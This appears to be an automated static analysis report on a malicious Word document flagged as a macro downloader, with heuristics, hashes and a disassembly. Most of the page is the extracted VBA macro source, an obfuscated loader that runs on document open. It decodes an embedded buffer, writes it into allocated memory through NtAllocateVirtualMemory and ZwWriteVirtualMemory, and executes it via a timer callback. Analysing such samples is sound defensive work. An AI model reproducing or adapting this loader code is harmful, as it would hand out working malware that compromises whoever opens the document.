Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea425ff715ab9e44…

MALICIOUS

Office (OLE)

176.0 KB Created: 2018-06-05 13:57:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 5b1040cb2cb67947febb10087f90b843 SHA-1: 1525e68afe99887d40f2c4be4668f692d8a328f9 SHA-256: ea425ff715ab9e4442ad99c51de73266241f4b3518c2a0d739c45227c2694b7a
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating it's a macro-based downloader. The presence of a Document_Open macro and embedded VBA code strongly suggests the intent to execute malicious code upon opening. The VBA script, though obfuscated, likely attempts to download and run a secondary payload, a common tactic for this type of malware.

Heuristics 5

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED
    Long run of 0x40 bytes
    Disassembly
    Attempted x86 opcode disassembly
    0000180D  40                inc eax
    0000180E  40                inc eax
    0000180F  40                inc eax
    00001810  40                inc eax
    00001811  40                inc eax
    00001812  40                inc eax
    00001813  40                inc eax
    00001814  40                inc eax
    00001815  40                inc eax
    00001816  40                inc eax
    00001817  40                inc eax
    00001818  40                inc eax
    00001819  40                inc eax
    0000181A  40                inc eax
    0000181B  40                inc eax
    0000181C  40                inc eax
    0000181D  40                inc eax
    0000181E  40                inc eax
    0000181F  40                inc eax
    00001820  40                inc eax
    00001821  40                inc eax
    00001822  40                inc eax
    00001823  40                inc eax
    00001824  40                inc eax
    00001825  40                inc eax
    00001826  40                inc eax
    00001827  40                inc eax
    00001828  40                inc eax
    00001829  40                inc eax
    0000182A  40                inc eax
    0000182B  40                inc eax
    0000182C  40                inc eax
    0000182D  40                inc eax
    0000182E  40                inc eax
    0000182F  40                inc eax
    00001830  40                inc eax
    00001831  40                inc eax
    00001832  40                inc eax
    00001833  40                inc eax
    00001834  40                inc eax
    00001835  40                inc eax
    00001836  40                inc eax
    00001837  40                inc eax
    00001838  40                inc eax
    00001839  40                inc eax
    0000183A  40                inc eax
    0000183B  40                inc eax
    0000183C  40                inc eax
    0000183D  40                inc eax
    0000183E  40                inc eax
    0000183F  40                inc eax
    00001840  40                inc eax
    00001841  40                inc eax
    00001842  40                inc eax
    00001843  40                inc eax
    00001844  40                inc eax
    00001845  40                inc eax
    00001846  40                inc eax
    00001847  40                inc eax
    00001848  40                inc eax
    00001849  40                inc eax
    0000184A  40                inc eax
    0000184B  40                inc eax
    0000184C  40                inc eax
    0000184D  40                inc eax
    0000184E  40                inc eax
    0000184F  40                inc eax
    00001850  40                inc eax
    00001851  40                inc eax
    00001852  40                inc eax
    00001853  40                inc eax
    00001854  40                inc eax
    00001855  40                inc eax
    00001856  40                inc eax
    00001857  40                inc eax
    00001858  40                inc eax
    00001859  40                inc eax
    0000185A  40                inc eax
    0000185B  40                inc eax
    0000185C  40                inc eax
    0000185D  40                inc eax
    0000185E  40                inc eax
    0000185F  40                inc eax
    00001860  40                inc eax
    00001861  40                inc eax
    00001862  40                inc eax
    00001863  40                inc eax
    00001864  40                inc eax
    00001865  40                inc eax
    00001866  40                inc eax
    00001867  40                inc eax
    00001868  40                inc eax
    00001869  40                inc eax
    0000186A  40                inc eax
    0000186B  40                inc eax
    0000186C  40                inc eax
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    Dim milliradian As String
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13810 bytes
SHA-256: a03f6e9b6feac72667c7b0003ae98de513c56f220159c5c3791fd9b8da789fe2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub MyTestArray()
    Dim myArray(1 To 4) As String ' Declaring array and setting bounds
    Dim Response As String
    Dim i As Integer
    Dim myFlag As Boolean

    myFlag = False
    myArray(1) = "A"
    myArray(2) = "B"
    myArray(3) = "C"
    myArray(4) = "D"

    Do Until myFlag = True
        Response = InputBox("Please enter your choice: (i.e. A,B,C or D)")
        For i = 1 To 4
            If UCase(Response) = UCase(myArray(i)) Then
                    myFlag = True: Exit For
            End If
        Next i
    Loop
End Sub

Sub charronia()
Dim elongation As Long
Dim aft As Variant
dalmatia.convivial.Value = Day(#12/5/2013#)
varday = coagulate = susurrant
bay = dracunculus
lentor = "cairina"
blossoming = "asia"
nonequivalence = qucksands

functionalism = "agropyron"
windy = "infuse"
snob = "kibitka"
Set immesh = dalmatia.convivial.SelectedItem
cur = 30 + 20
 Pmt 0, cur, 31994, 42250, 5

morceau = immesh.Name
adelgidae = 42 - 89 + 7891
lemures = Right(morceau, adelgidae)
lyricality = deckle.associationism(lemures)
anaglyphy = 6 + 35
 Pmt 0, anaglyphy, 26684, 37632, 7

asclepiad = "evaluator"
#If (8 - 86 + 478 + 32 - 14 + 282) > ((47 - 35 + 308) - (30 - 48 + 558) * 1) And ((71 - 50 + 7) - (120 - 79 - 13)) * 2 < (Win64) Then
Dim blessed As String
Dim pharmacological As LongPtr
Dim connate As LongPtr
Dim quilck As Integer
#ElseIf (69 - 99 + 430 + 117 - 58 + 241) > ((77 - 10 + 253) - (23 - 41 + 558) * 1) And Not ((112 - 116 + 32) - (77 - 90 + 41)) * 2 < (Win64) Then
Dim moneybag As Byte
Dim connate As Long
Dim meshes As String
Dim pharmacological As Long
#End If
bomber = 121 - 46 - 75
ferociously = "certifiable"
annalistic = 44 - 12 + 4064
enology = 48 + 10
 Pmt 0, enology, 6000, 59593, 3

briarwood = "scrambling"
bey = "retrospection"
mawworm = buckshee
casuarinaceae = 26 + 47
 Pmt 0, casuarinaceae, 2847, 52052, 8

vadium = lyricality
diaphragm = "pettily"
pharmacological = amidst(vadium)
inclination = acrobatic
extrinsicality = "acheta"
#If (64 - 77 + 413 + 20 - 118 + 398) > ((114 - 47 + 253) - (27 - 114 + 627) * 1) And ((32 - 106 + 102) - (23 - 116 + 121)) * 2 < (Win64) Then
Dim consols As Byte
Dim disapproving As LongPtr
Dim pretense As LongPtr
Dim abbreviate As LongPtr
milliary = 55 - 90 + 2099
#ElseIf (23 - 1 + 378 + 73 - 53 + 280) > ((50 - 88 + 358) - (12 - 56 + 584) * 1) And Not ((124 - 67 - 29) - (117 - 127 + 38)) * 2 < (Win64) Then
Dim disapproving As Long
greenockite = 42 - 17 + 756
Dim pretense As Long
Dim abbreviate As Long
milliary = greenockite + 3459

#End If
Dim committeewoman As Variant
Dim oppositeness As Variant
disapproving = 36 - 15 - 21
connate = pharmacological + milliary
pretense = 108 - 21 + 201440
abbreviate = 58 - 71 + 3513
archenteron = headlike(pretense, disapproving, connate, disapproving, disapproving, disapproving, disapproving)
silicle = 8 + 12
 Pmt 0, silicle, 34176, 40946, 8

End Sub

Private Sub Document_Open()
Dim milliradian As String
Dim pace As Integer
seventies = "barrage"
charronia
janissary = 20 + 2
 Pmt 0, janissary, 36851, 50656, 4
End Sub
Function assyriology(anaphase, propitiation, illdisposed)
Dim botanic As Long
Dim parana As Byte
Dim parrotfish As LongPtr
Dim mastermind As LongPtr
Dim polaroid As LongPtr
Dim inquiringly As Byte
Dim enterprising As LongPtr
Dim beeswax As LongPtr
complicity = complicity And 58
mensongesfrench = erignathus
mastermind = anaphase
beeswax = illdisposed
seditions = Math.Round(315)
enterprising = propitiation
sanative = 31 + 13
 Pmt 0, sanative, 17927, 41448, 5

seditions = Fix(418)
parrotfish = 100 - 22 - 79
callionymidae ByVal parrotfish, _
mastermind, _
enterprising, beeswax, _
polaroid
mensongesfrench = erignathus
End Function
Function amidst(athelstan)
Dim holster As String
Dim mendicity As String
Dim comparatively As String
Dim cornmeal As Variant
#If (46 - 44 + 398 + 95 - 7 + 212) > ((52 - 113 + 381) - (25 - 95 + 610) * 1) And ((76 - 71 + 23) - (43 - 13 - 2)) * 2 < (Win64) Then
Dim isogram As Integer
Dim greasewood As LongPtr
allograph = 11 - 20 + 17
Dim superbug As LongPtr
Dim eyespot As Integer
Dim auspicium As Integer
Dim chimera As LongPtr
Dim marches As String
bunion = VarPtr(greasewood)
odylic = assyriology(bunion, VarPtr(athelstan) + (2 - 111 + 117), allograph)
#ElseIf (17 - 77 + 460 + 74 - 52 + 278) > ((96 - 71 + 295) - (82 - 32 + 490) * 1) And Not ((9 - 16 + 35) - (62 - 9 - 25)) * 2 < (Win64) Then
Dim greasewood As Long
allograph = 10 - 45 + 39
Dim superbug As Long
Dim chimera As Long
bunion = VarPtr(greasewood)
odylic = attrition(bunion, VarPtr(athelstan) + (15 - 72 + 65), allograph)
#End If
donnybrook = 28 - 67 + 38
superbug = 44 - 59 + 15
darwinism = 53 - 62 + 9
chimera = 127 - 83 + 9374
plutocracy = 56 - 58 + 4098
overpayment = 108 - 77 + 33
delf = lessen(ByVal donnybrook, _
superbug, ByVal darwinism, chimera, ByVal plutocracy, _
ByVal overpayment)
seditions = Math.Round(185)

complicity = Rnd(313)

#If (40 - 18 + 378 + 25 - 127 + 402) > ((29 - 7 + 298) - (2 - 76 + 614) * 1) And ((22 - 107 + 113) - (83 - 103 + 48)) * 2 < (Win64) Then
incrassation = assyriology(superbug, greasewood, 108 - 83 + 5858)
#ElseIf (119 - 15 + 296 + 47 - 27 + 280) > ((112 - 114 + 322) - (8 - 17 + 549) * 1) And Not ((91 - 83 + 20) - (50 - 14 - 8)) * 2 < (Win64) Then
caliban = attrition(superbug, greasewood, 35 - 113 + 5961)
#End If
neohygrophorus = 60 + 7
 Pmt 0, neohygrophorus, 13682, 12639, 5

amidst = superbug
End Function
Function attrition(hypermarket, theosophy, bushman)
Dim indefiniteness As Long
Dim argasidae As String
Dim macaw As Long
Dim epoch As String
Dim palmales As Long
Dim beret As Integer
Dim amitotic As Long
Dim grumous As Long
Dim patrol As Long
Dim interplanetary As Byte
Dim misocainea As Long
mensongesfrench = mensongesfrench
mensongesfrench = mensongesfrench
indefiniteness = hypermarket
patrol = bushman
erignathus = "lichenes"
palmales = theosophy
sugarloaf = 15 + 40
 Pmt 0, sugarloaf, 6903, 50808, 2

complicity = Fix(179)
macaw = 43 - 49 + 5
callionymidae ByVal macaw, indefiniteness, palmales, patrol, amitotic
unrepining = seditions / 375
End Function


Attribute VB_Name = "deckle"
#If (117 - 114 + 397 + 103 - 102 + 299) > ((105 - 93 + 308) - (45 - 50 + 545) * 1) And ((67 - 21 - 18) - (117 - 58 - 31)) * 2 < (Win64) Then
Public  Declare PtrSafe Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (manubrium As Any, ByVal arbiter As Any, ByVal panhellenic As Any, ByVal primed As Any, ByVal avulso As Any, ByVal blessed As Any, ByVal loner As Any) As Long
Public Declare PtrSafe Function lessen _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (cushcush As LongPtr, erebus As LongPtr, ByVal annis As LongPtr,hydrasByVal As LongPtr, magsman As LongPtr, ByVal closeness As LongPtr) As LongPtr
Public Declare PtrSafe Function amphibolite _
Lib "Shlwapi  " Alias _
"SleepConditionVariableSRW" (ByVal placement As Any, beating As Any, past As Any, oleandraceae As Any) As LongPtr
Public Declare PtrSafe Function grog _
Lib "ntdll   " Alias _
"AcquireSRWLockShared" (burrlike As Any) As LongPtr
Public Declare PtrSafe Function ashcan _
Lib "Shlwapi   " Alias _
"GetOverlappedResult" (ByVal biliary As Any, byre As Any, obsequious As Any, glissade As Any) As LongPtr
Public Declare PtrSafe Function callionymidae _
Lib "ntdll    " Alias _
"ZwWriteVirtualMemory" (ByVal caesura As Any, ByVal ginger As Any, ByVal coreference As Any, ByVal akin As Any, ByVal fieriness As Any) As LongPtr

#ElseIf (120 - 84 + 364 + 27 - 69 + 342) > ((63 - 93 + 350) - (22 - 74 + 592) * 1) And Not ((120 - 108 + 16) - (62 - 25 - 9)) * 2 < (Win64) Then
Public Declare Function headlike _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (mounting As Any, ByVal trouvere As Any, ByVal catachrestic As Any, ByVal describe As Any, ByVal abstract As Any, ByVal biflagellate As Any, ByVal bisquit As Any) As Long
Public Declare Function oleandra _
Lib "ntdll    " Alias _
"AcquireSRWLockShared" (seeking As Any) As Long
Public Declare Function callionymidae _
Lib "ntdll    " Alias _
"ZwWriteVirtualMemory" (ByVal effortlessly As Any, ByVal protoplasm As Any, ByVal crustose As Any, ByVal carthusian As Any, ByVal compensation As Any) As Long
Public Declare Function boatswain _
Lib "Shlwapi   " Alias _
"GetOverlappedResult" (ByVal cusp As Any, lens As Any, superannuated As Any, shorn As Any) As Long
Public Declare Function hideaway _
Lib "Shlwapi   " Alias _
"SleepConditionVariableSRW" (ByVal dad As Any, spectrometric As Any, betulaceous As Any, duplicature As Any) As Long
Public Declare Function lessen _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (geotropism As Long, lubricity As Long, ByVal discontentment As Long, hypoactiveByVal As Long, regulate As Long, ByVal missile As Long) As Long

#End If
Function associationism(strawboard) As String
Dim scours As Long
Dim telephotography As String
complicity = Math.Round(227)

Dim sociologically As Long
Dim abnormalize(6962) As Byte
Dim chyle As Long
Dim chrism() As Byte
Dim chorizagrotis(63) As Long
Dim brat As Integer
Dim macaire(63) As Long
Dim gentlemanly As Long
Dim currishly(63) As Long
endlessly = 34 - 36 + 16711682
whiffletree = 100 - 35 - 1
Dim bel As Variant

bloodyminded = 86 - 72 + 4082
bazeingr = 57 - 40 + 65519
jhuth = 91 - 91 + 262144
cashew = 22 - 71 + 258097
vesalius = 3 - 106 + 166
been = 106 - 24 + 16514990
Dim fidus As Byte

nati = 99 - 20 + 177
prepubescent = 46 - 23 + 4009
Dim lightsomeness As Long

nozzle = 78 - 34 + 65236
corollary = 37 - 49 + 267
Dim sublimity As Long
delilah = 8 - 65 + 7900
Dim abrasion() As Byte
abrasion = VBA.StrConv(strawboard, 120 + 8)
paraboloid = 44 + 55
 Pmt 0, paraboloid, 5934, 30053, 2

circularknit = 7843
madwoman = vbKeyShift - 12
For unaligned = 0 To circularknit
If unaligned Mod 2 = 0 Then
abrasion(unaligned) = abrasion(unaligned) - madwoman
Else
abrasion(unaligned) = abrasion(unaligned) - (madwoman - 1)
End If
Next unaligned
monistic = 24 + 6
 Pmt 0, monistic, 19309, 35586, 7

brat = 0
amah = dynamite
For chyle = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
currishly(chyle) = churl(chyle, whiffletree, 49)
chorizagrotis(chyle) = churl(chyle, bloodyminded, 49)
macaire(chyle) = churl(chyle, jhuth, 49)
Next chyle
faithless = 31 + 2
 Pmt 0, faithless, 4128, 38197, 6

chrism = abrasion
branchiopod = 76 - 94 + 22
bottomland = 45 + 24
 Pmt 0, bottomland, 9912, 41348, 8

backhand = 73 - 88 + 18
unrepining = complicity - 177

mensongesfrench = erignathus

stares = backhand + 1
hyperborean = 11 - 39 + 30
For scours = 0 To circularknit
edible = chrism(scours)
balbriggan = chrism(scours + 2)
cloudy = chorizagrotis(amah(chrism(scours + 1)))
musketry = currishly(amah(balbriggan)) + amah(chrism(scours + backhand))
sociologically = macaire(amah(edible)) + cloudy + musketry
chyle = churl(sociologically, endlessly, 41)
abnormalize(gentlemanly) = churl(chyle, bazeingr, 31)
chyle = churl(sociologically, nozzle, 41)
abnormalize(gentlemanly + 1) = churl(chyle, nati, 31)
abnormalize(gentlemanly + hyperborean) = churl(sociologically, corollary, 41)
gentlemanly = gentlemanly + hyperborean + 1
scours = scours + 3
Next
associationism = abnormalize
End Function

Function hypotonic(chops)
hypotonic = AscW(chops)
End Function
Function dynamite()
Dim turfman(255) As Byte
microglia = 38 - 95 + 122
For i = microglia To (16 - 45 + 120)
turfman(microglia) = microglia - (62 - 84 + 87)
microglia = microglia + 1
If (76 - 88 + 103) < microglia Then
airmanship = camisole + 4 - 43 + 104
Exit For
End If
civile = elderberry + 27 - 29 + 67
Next
microglia = (76 - 124 + 96)
For i = microglia To (85 - 41 + 14)
turfman(microglia) = microglia + (104 - 90 - 10)
microglia = microglia + 1
If (53 - 102 + 107) < microglia Then
acariasis = optimism + 81 - 44 + 28
Exit For
End If
infamous = ungentle + 126 - 51 - 10
Next
microglia = (90 - 119 + 126)
For i = microglia To (20 - 46 + 149)
turfman(microglia) = microglia - (91 - 112 + 92)
microglia = microglia + 1
oneirocritic = bigamy + 14 - 14 + 65
If (63 - 35 + 95) < microglia Then
doublebedded = porousness + 99 - 111 + 77
Exit For
End If
beacon = orleanist + 118 - 106 + 53
Next
turfman(106 - 10 - 49) = (50 - 57 + 70)
microglia = (120 - 6 - 71)
turfman(microglia) = (60 - 121 + 123)
dynamite = turfman
End Function
Sub range()
    Dim rngFirstList As range
    Set rngFirstList = ActiveDocument.Lists(1).range
    ActiveDocument.Windows(1).ScrollIntoView Obj:=rngFirstList, Start:=False
    rngFirstList.Select
    Selection.Collapse Direction:=wdCollapseEnd
    Selection.MoveLeft Unit:=wdCharacter, Count:=1, Extend:=wdMove
End Sub

Function churl(sedativehypnotic, chine, disused)
Select Case disused
Case 31 + (10 / 2 - 5)
churl = sedativehypnotic \ chine
Case 41 + (5 - 3) / 2 - 1
churl = sedativehypnotic And chine
Case 49 + (56 / 7 - 4 * 2)
churl = sedativehypnotic * chine
End Select
End Function


Attribute VB_Name = "dalmatia"
Attribute VB_Base = "0{AB6DF160-CB04-4CB3-9A5A-F90DCC2FC2B7}{101CE94B-4C91-4B50-A705-BD3E3EF1583D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False